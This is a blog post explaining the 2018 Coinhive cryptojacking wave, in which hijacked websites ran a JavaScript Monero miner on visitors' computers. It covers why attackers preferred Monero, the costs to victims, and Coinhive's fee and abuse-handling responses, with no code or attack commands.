Posts Tagged ‘malware’

Who And What Is Coinhive?

Saturday, May 5th, 2018

With the value of cryptocurrencies skyrocketing, hackers are continuously seeking means to exploit web services owned by businesses. In this brouhaha, no one is spared. Government-owned websites and cloud service providers like Amazon and even yours could be hijacked by a cryptocurrency miner to mine currencies for free. There are many ways hackers are going about the cryptocurrency gold mine, but coinhive will be the primary focus of this piece.

What is Coinhive?

Coinhive is a JavaScript cryptocurrency miner that has been continuously abused by hackers. Hackers exploit a vulnerability in a website such that every time someone views the site, it anonymously mines cryptocurrency by stealing the processing power of the web visitors. The cryptocurrency miner itself is a legitimate software but has unfortunately been abused by hackers who are looking to earn a living to the detriment of unknown persons.

The JavaScript cryptocurrency mining service depends on a small chunk of computer code, created to be installed on websites. It works by using the power generated from any browser visited, propelling the machine to mine Monero cryptocurrency. The general idea of this software release was a means for Web site owners to make a living without running into intrusive adverts. However, shortly after its official release, Coinhive has been ranked as a top malware threat.

What Happened?

Thousands of websites were hijacked by a cryptocurrency miner, making web visitors a tool to mine digital currencies. It was discovered that Coinhive was at the center of this misdemeanor. Mining cryptocurrencies consume a lot of power; so why absorb so much and pile your bills when you can have numerous people do the work for you? This was the case. The plugin allows websites to anonymously use visitor’s computing power, while they mine for the cryptocurrency. In this case, they mined monero and not bitcoin.

Why Monero, and not bitcoin, the King of cryptocurrencies?

Although bitcoin is the most sought after cryptocurrency, hackers prefer to mine Monero because transactions are virtually untraceable. Monero was created with the same purpose as Bitcoin where transactions occur without a central authority involved. Many people hold a common misconception or belief that bitcoin is an anonymous currency. This is the case. Balances and transactions are connected to the users’ wallet address. As such, operations can be traced to wallet addresses, making it easy to track down hackers or criminals.

It is the contrary case with monero. This cryptocurrency has a more significant anonymity signature. Unlike blockchain wallets, monero wallets are protected by viewkeys. It implies that only the owners have access to their transactions, making it a safer and more discreet option for hackers. There is no way a third-party can intercept transactions between two people.

Hacking Implications

This version of coinhive runs without your knowledge, draining your system’s battery. It works in the background without notifications or permissions from whoever. Aside from wasting your system’s battery, what other implications are there for it? As earlier stated, mining digital currencies consume a lot of power and so can put your system in harm’s way without you detecting the cause of the problem. Some of the implications include:

  • Affecting your machine’s performance, making it run slower than expected. When the fans are kicking, and hardware is working more than usual with the CPU operating more intensively than usual, the machine is bound to fail.
  • Damaging your device. Running at full speed all the time is not ideal for a machine, so you should be careful.
  • Outrageous power consumption, which will make your electricity bill to skyrocket. This, in fact, is the principal reason hackers install these plugins to mine their digital currencies for them.

Worst of all, you don’t get to see the money because the hackers are diverting the currencies. In other words, you are an anonymous making machine for some unknown persons. They use your system and your power and still take the proceeds, leaving you with more bills to pay.

Is there a permanent Solution?

Hackers rely on loopholes in the system to perpetrate mayhem. The reason why government own websites were hacked is that they noticed a vulnerability or inadequacies in the system. A lot of people do not bother to protect their sites from internet fraudsters. It’s a wakeup call for website owners. The easiest way out is to install antivirus software or antimalware programs.

Regardless of how tech-savvy you are, you must ensure your system is equipped with a suitable antivirus software to protect you from hackers. Remember they use the backdoor to install the JavaScript plugin, working in the background, so you don’t notice. An excellent antivirus tool will detect the spyware, notify you with popups so you can proceed to block them from accessing your computer system.

Does Coinhive Benefit from The Hack?

This JavaScript cryptocurrency miner appears to benefit from the hack. It takes a 30% share off whatever amount that is mined using its code. Although It was not intended to be exploited, coinhive automatically takes a percentage every time an amount is mined regardless of whether the site gave its authorization or not.  The code has a unique cryptographic key that indicates the user to receive the other 70%. Little wonder why coinhive has been reportedly slow to act.

What Measures Have Been Taken?

Coinhive accepts complaints reporting abuse from but ignores grievances that do not come hacked websites owners. However, they respond to abuse complaints by nullifying the key tied to the abuse, and this does not issue a lasting solution. Instead, it begins to keep 100% of the digital currency linked to that account. The only person losing out is the hacker and you. According to Mursch, invalidating a key does not automatically disrupt the mining process. The code keeps running in the background and coinhive takes it all, leaving the hacker with nothing. In simpler terms, the problem remains the same- your system is still running at risk, and you still have a pile of electricity bills to pay.

As the case may be, coinhive claims that the organization is working to fix the current situation. It stated in an email that a user cannot delete a site key and that they were currently working on a mechanism to disseminate the invalidation of a key to their WebSocket servers. In response to the criticism, it released a code called “AuthedMine” which will prompt miners to seek authorization from website owners before running the cryptocurrency mining script.